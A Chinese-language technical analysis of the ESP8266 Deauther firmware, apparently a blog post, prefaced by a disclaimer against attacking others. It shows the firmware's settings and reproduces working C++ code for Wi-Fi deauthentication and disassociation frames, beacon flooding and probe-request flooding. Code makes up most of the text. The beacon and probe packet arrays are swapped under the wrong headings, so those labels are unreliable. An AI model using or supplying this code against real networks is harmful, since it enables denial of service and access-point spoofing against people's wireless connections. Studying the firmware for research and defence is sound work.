这一系列的文章仅作技术研究,请遵守相关法律(中华人民共和国网络安全法),请勿使用相关技术来攻击他人!
1 软件配置方法
1.1wifi相关配置
这一部分的配置在wifi.h文件中,这里规定了web文件的位置,已经wifi的配置。比如登陆的ip地址,默认是192.168.4.1,默认的子网掩码是255.255.255.0。
// Server and other global objects
ESP8266WebServer server(80);
DNSServer dnsServer;
IPAddress apIP(192, 168, 4, 1);
IPAddress netMsk(255, 255, 255, 0);
File fsUploadFile;
// current WiFi mode and config
uint8_t wifiMode = WIFI_MODE_OFF;
bool wifi_config_hidden = false;
bool wifi_config_captivePortal = false;
String wifi_config_ssid;
String wifi_config_password;
String wifi_config_path;
1.2核心配置
这一部分的配置在Setting.h中,比如版本号、攻击超时时间、wifi的channel、SSID、password、是否隐藏SSID、语言等。比如登陆使用的SSID默认为pwned,密码默认为deauther,默认的语言为英语。本来想做一个汉化包进去方便中国爱好者使用,后来发现在V2.1中,已经加入了中文语言包。V2.1web页面支持的语言包括:cn中文、cs捷克语、de德语、en英语、es西班牙语、fi芬兰语、fr法语、it意大利语、ro罗马尼亚语、ru俄语、tlh克林贡语
bool changed = false;
String version = VERSION;
bool beaconChannel = false;
bool autosave = true;
bool beaconInterval = false;
bool cli = true;
bool displayInterface = USE_DISPLAY;
bool webInterface = true;
bool webSpiffs = false;
bool randomTX = false;
bool ledEnabled = true;
bool serialEcho = true;
uint32_t attackTimeout = 600;
uint32_t autosaveTime = 10000;
uint32_t displayTimeout = 600;
uint16_t deauthsPerTarget = 20;
uint16_t chTime = 384;
uint16_t minDeauths = 3;
uint8_t forcePackets = 1;
uint8_t channel = 9;
uint8_t deauthReason = 1;
uint8_t *macSt;
uint8_t *macAP;
uint8_t probesPerSSID = 1;
String ssid = "pwned";
String password = "deauther";
bool hidden = false;
bool captivePortal = true;
String lang = "en";
(3)其他配置
其他的配置设及到一些关键的数据结构,这里没有多做研究。
2 网络攻击核心代码解析
2.1 deauth攻击
(1)deauth攻击数据包deauthPacket[26]的结构
uint8_t deauthPacket[26] = {
/* 0 - 1 */ 0xC0, 0x00, // type, subtype c0: deauth (a0: disassociate)
/* 2 - 3 */ 0x00, 0x00, // duration (SDK takes care of that)
/* 4 - 9 */ 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, // reciever (target)
/* 10 - 15 */ 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, // source (ap)
/* 16 - 21 */ 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, // BSSID (ap)
/* 22 - 23 */ 0x00, 0x00, // fragment & squence number
/* 24 - 25 */ 0x01, 0x00 // reason code (1 = unspecified reason)
}
(2)deauth攻击核心代码
bool Attack::deauthDevice(uint8_t* apMac, uint8_t* stMac, uint8_t reason, uint8_t ch) {
if (!stMac) return false; // exit when station mac is null
// Serial.println("Deauthing "+macToStr(apMac)+" -> "+macToStr(stMac)); // for debugging
bool success = false;
// build deauth packet
packetSize = sizeof(deauthPacket);
memcpy(&deauthPacket[4], stMac, 6);
memcpy(&deauthPacket[10], apMac, 6);
memcpy(&deauthPacket[16], apMac, 6);
deauthPacket[24] = reason;
// send deauth frame
deauthPacket[0] = 0xc0;
if (sendPacket(deauthPacket, packetSize, ch, settings.getForcePackets())) {
success = true;
deauth.packetCounter++;
}
// send disassociate frame
deauthPacket[0] = 0xa0;
if (sendPacket(deauthPacket, packetSize, ch, settings.getForcePackets())) {
success = true;
deauth.packetCounter++;
}
// send another packet, this time from the station to the accesspoint
if (!macBroadcast(stMac)) { // but only if the packet isn't a broadcast
// build deauth packet
memcpy(&deauthPacket[4], apMac, 6);
memcpy(&deauthPacket[10], stMac, 6);
memcpy(&deauthPacket[16], stMac, 6);
// send deauth frame
deauthPacket[0] = 0xc0;
if (sendPacket(deauthPacket, packetSize, ch, settings.getForcePackets())) {
success = true;
deauth.packetCounter++;
}
// send disassociate frame
deauthPacket[0] = 0xa0;
if (sendPacket(deauthPacket, packetSize, ch, settings.getForcePackets())) {
success = true;
deauth.packetCounter++;
}
}
if (success) deauth.time = currentTime;
return success;
}
2.2 beacon攻击
(1)beacon攻击数据包beaconPacket[68]的结构
uint8_t probePacket[68] = {
/* 0 - 1 */ 0x40, 0x00, // Type: Probe Request
/* 2 - 3 */ 0x00, 0x00, // Duration: 0 microseconds
/* 4 - 9 */ 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, // Destination: Broadcast
/* 10 - 15 */ 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, // Source: random MAC
/* 16 - 21 */ 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, // BSS Id: Broadcast
/* 22 - 23 */ 0x00, 0x00, // Sequence number (will be replaced by the SDK)
/* 24 - 25 */ 0x00, 0x20, // Tag: Set SSID length, Tag length: 32
/* 26 - 57 */ 0x20, 0x20, 0x20, 0x20, // SSID
0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20,
/* 58 - 59 */ 0x01, 0x08, // Tag Number: Supported Rates (1), Tag length: 8
/* 60 */ 0x82, // 1(B)
/* 61 */ 0x84, // 2(B)
/* 62 */ 0x8b, // 5.5(B)
/* 63 */ 0x96, // 11(B)
/* 64 */ 0x24, // 18
/* 65 */ 0x30, // 24
/* 66 */ 0x48, // 36
/* 67 */ 0x6c // 54
}
(2)beacon攻击核心代码
bool Attack::sendBeacon(uint8_t* mac, const char* ssid, uint8_t ch, bool wpa2) {
packetSize = sizeof(beaconPacket);
if (wpa2) {
beaconPacket[34] = 0x31;
} else {
beaconPacket[34] = 0x21;
packetSize -= 26;
}
int ssidLen = strlen(ssid);
if (ssidLen > 32) ssidLen = 32;
memcpy(&beaconPacket[10], mac, 6);
memcpy(&beaconPacket[16], mac, 6);
memcpy(&beaconPacket[38], ssid, ssidLen);
beaconPacket[82] = ch;
// =====
uint16_t tmpPacketSize = (packetSize - 32) + ssidLen; // calc size
uint8_t* tmpPacket = new uint8_t[tmpPacketSize]; // create packet buffer
memcpy(&tmpPacket[0], &beaconPacket[0], 38 + ssidLen); // copy first half of packet into buffer
tmpPacket[37] = ssidLen; // update SSID length byte
memcpy(&tmpPacket[38 + ssidLen], &beaconPacket[70], wpa2 ? 39 : 13); // copy second half of packet into buffer
if (sendPacket(tmpPacket, tmpPacketSize, ch, settings.getForcePackets())) {
beacon.time = currentTime;
beacon.packetCounter++;
delete tmpPacket; // free memory of allocated buffer
return true;
} else {
delete tmpPacket; // free memory of allocated buffer
return false;
}
// =====
}
2.3 probe攻击
(1)probe攻击数据包probePacket[109]的结构
uint8_t beaconPacket[109] = {
/* 0 - 3 */ 0x80, 0x00, 0x00, 0x00, // Type/Subtype: managment beacon frame
/* 4 - 9 */ 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, // Destination: broadcast
/* 10 - 15 */ 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, // Source
/* 16 - 21 */ 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, // Source
// Fixed parameters
/* 22 - 23 */ 0x00, 0x00, // Fragment & sequence number (will be done by the SDK)
/* 24 - 31 */ 0x83, 0x51, 0xf7, 0x8f, 0x0f, 0x00, 0x00, 0x00, // Timestamp
/* 32 - 33 */ 0xe8, 0x03, // Interval: 0x64, 0x00 => every 100ms - 0xe8, 0x03 => every 1s
/* 34 - 35 */ 0x31, 0x00, // capabilities Tnformation
// Tagged parameters
// SSID parameters
/* 36 - 37 */ 0x00, 0x20, // Tag: Set SSID length, Tag length: 32
/* 38 - 69 */ 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, // SSID
// Supported Rates
/* 70 - 71 */ 0x01, 0x08, // Tag: Supported Rates, Tag length: 8
/* 72 */ 0x82, // 1(B)
/* 73 */ 0x84, // 2(B)
/* 74 */ 0x8b, // 5.5(B)
/* 75 */ 0x96, // 11(B)
/* 76 */ 0x24, // 18
/* 77 */ 0x30, // 24
/* 78 */ 0x48, // 36
/* 79 */ 0x6c, // 54
// Current Channel
/* 80 - 81 */ 0x03, 0x01, // Channel set, length
/* 82 */ 0x01, // Current Channel
// RSN information
/* 83 - 84 */ 0x30, 0x18,
/* 85 - 86 */ 0x01, 0x00,
/* 87 - 90 */ 0x00, 0x0f, 0xac, 0x02,
/* 91 - 92 */ 0x02, 0x00,
/* 93 - 100 */ 0x00, 0x0f, 0xac, 0x04, 0x00, 0x0f, 0xac, 0x04, /*Fix: changed 0x02(TKIP) to 0x04(CCMP) is default. WPA2 with TKIP not supported by many devices*/
/* 101 - 102 */ 0x01, 0x00,
/* 103 - 106 */ 0x00, 0x0f, 0xac, 0x02,
/* 107 - 108 */ 0x00, 0x00}
(2)probe攻击核心代码
bool Attack::sendProbe(uint8_t* mac, const char* ssid, uint8_t ch) {
packetSize = sizeof(probePacket);
int ssidLen = strlen(ssid);
if (ssidLen > 32) ssidLen = 32;
memcpy(&probePacket[10], mac, 6);
memcpy(&probePacket[26], ssid, ssidLen);
if (sendPacket(probePacket, packetSize, ch, settings.getForcePackets())) {
probe.time = currentTime;
probe.packetCounter++;
return true;
}
return false;
}